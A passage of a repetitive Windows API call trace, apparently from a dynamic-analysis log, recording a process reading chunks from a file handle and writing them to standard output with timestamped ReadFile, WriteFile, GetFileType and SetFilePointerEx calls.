lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] GetFileType (hFile=0x4c) returned 0x1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.004] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.004] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.102] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.102] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] GetFileType (hFile=0x4c) returned 0x1 [0237.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.102] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] GetFileType (hFile=0x4c) returned 0x1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] GetFileType (hFile=0x4c) returned 0x1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.103] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.103] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.103] GetFileType (hFile=0x4c) returned 0x1 [0237.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.112] GetFileType (hFile=0x4c) returned 0x1 [0237.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.113] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.113] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.113] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.114] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.114] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.114] GetFileType (hFile=0x4c) returned 0x1 [0237.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.115] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.115] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] GetFileType (hFile=0x4c) returned 0x1 [0237.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.115] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] GetFileType (hFile=0x4c) returned 0x1 [0237.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.116] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.116] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.117] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.117] GetFileType (hFile=0x4c) returned 0x1 [0237.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.118] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.118] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x200, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeef0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeef0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef40*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eef90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eef90*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2eefe0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eefe0*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] GetFileType (hFile=0x4c) returned 0x1 [0237.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.118] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef030*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef030*, lpNumberOfBytesWritten=0x2ee084*=0x50, lpOverlapped=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] GetFileType (hFile=0x4c) returned 0x1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee084*=0x20, lpOverlapped=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.119] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, 